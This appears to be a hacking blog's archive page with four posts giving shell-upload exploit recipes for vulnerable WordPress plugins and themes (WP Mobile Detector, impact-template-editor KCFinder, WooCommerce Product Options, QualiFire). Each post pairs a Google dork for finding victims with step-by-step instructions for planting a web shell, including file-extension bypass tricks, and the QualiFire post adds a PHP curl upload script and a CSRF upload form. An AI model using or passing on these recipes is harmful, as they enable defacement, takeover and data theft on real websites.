Showing posts with label wordpress. Show all posts
Showing posts with label wordpress. Show all posts

Thursday, February 23, 2017

WordPress Plugins WP Mobile Detector Shell Upload Vulnerability

WordPress Plugins WP Mobile Detector Shell Upload Vulnerability



#- Title: WordPress Plugins WP Mobile Detector Shell Upload Vulnerability
#- Author: aaditya purani
#- Date: 2016/06/03
#- Developer : Jesse Friedman
#- Link Download : wordpress. org/plugins/wp-mobile-detector
#- Google Dork: inurl:"/plugins/wp-mobile-detector/"
#- Fixed in Version : 3.6 / Fixed exploit with resize script.
#- Tested on : windows
=======================================================
-- Proof Of Concept --

Description : 
Kelemahan ini telah terpecahkan untuk publik yaitu WP Mobile Detector Arbitrary File upload untuk versi 3.5. Dimana seorang attacker dapat mengupload  Malicious File / shell ke dalam sebuah website. Lebih dari 10.000 website terinfeksi bug ini. Tetapi vendor sudah merilis patch terbaru dari versi ini aitu versi 3.6 dan versi 3.7. Bahkan Securi sudah mempublikasikan kerentanan ini.

Vulnerability : site/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]

Method : 
1. Cari Target.
2. Target/wp-content/plugins/wp-mobile-detector/resize.php?src=Link Shell Kamu
3. Jika berhasil maka shell tersebut akan tersimpan di dir /cache/

Format Shell > php

Need Shell Path ? Click Here 

Available link for download

Read more »
Posted by at
Labels: , , , , , , ,

Wordpress Plugins impact template editor KCFinder Shell Upload

Wordpress Plugins impact template editor KCFinder Shell Upload




#- Title: Wordpress Plugins impact-template-editor KCFinder Shell Upload
#- Author: Putra Attacker
#- Date: -
#- Developer : WPEka Club
#- Link Download : wordpress. org/plugins/impact-template-editor/
#- Google Dork: inurl:"/plugins/impact-template-editor/"
#- Fixed in Version : -
#- Tested on : win
=======================================================

-- Proof Of Concept --




Vulnerable : /wp-content/plugins/impact-template-editor/lib/kcfinder/browse.php

When Vuln : Like a Kcfinder.

Methode :
1. Upload Your Shell, Php extension not allowed, so u can upload your shell with extension .php.asp / .php.pler
2. if Succesfully uploaded. find your shell.
Example :

browser.uploadURL = "/upload";
browser.dir = "impact";

See.. you can find your shell in Here

Available link for download

Read more »
Posted by at
Labels: , , , , , , ,

Saturday, February 4, 2017

Wordpress Product Options for WooCommerce Plugin File Upload

Wordpress Product Options for WooCommerce Plugin File Upload



#- Title: Wordpress Product Options for WooCommerce Plugin File Upload
#- Author: M4ni4c
#- Date: 2016-04-11
#- Developer : WPShowCase
#- Link Download : codecanyon. net/item/product-options-for-woocommerce-wp-plugin/7973927
#- Google Dork: inurl:"/plugins/woocommerce-product-options/"
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --


Vulnerability : site/wp-content/plugins/woocommerce-product-options/includes/image-upload.php

When Vulnerable : U can find uploader

Method 

Prepare : You must change your shell extension to .php;.jpg 
Example : 3xploi7.php -> 3xploi7.php;.jpg

1. Choose your target
2. Give exploit /wp-content/plugins/woocommerce-product-options/includes/image-upload.php in your target
3. U will find the uploader and u can upload your shell

Example : 3xploi7.blogspot.com/wp-content/plugins/woocommerce-product-options/includes/image-upload.php

Need Shell Path ?? Click Here

Available link for download

Read more »
Posted by at
Labels: , , , , , , ,

Friday, January 20, 2017

Wordpress Themes QualiFire File Upload Vulnerability

Wordpress Themes QualiFire File Upload Vulnerability



#- Title: Wordpress Themes QualiFire File Upload Vulnerability
#- Author: Tn_Scorpion
#- Date: 01-07-2012
#- Developer : AndonDesign
#- Link Download : themeforest .net/item/qualifire-wordpress-theme/105879
#- Google Dork: inurl:"/themes/qualifire/"
#- Fixed in Version : -
#- Tested on : win
=======================================================

-- Proof Of Concept --



Vulnerable : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

When Vuln : Blank

Remote file :
<?php
  
$uploadfile="shell.php";
$ch = curl_init("http://example .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array(Filedata=>"@$uploadfile",
              folder=>/wp-content/themes/qualifire/scripts/admin/uploadify/));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
  
  print "$postResult";
?>

CSRF :
<form
action="http://target .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>


Shell Path : Here

Available link for download

Read more »
Posted by at
Labels: , , , , ,
Subscribe to: Posts (Atom)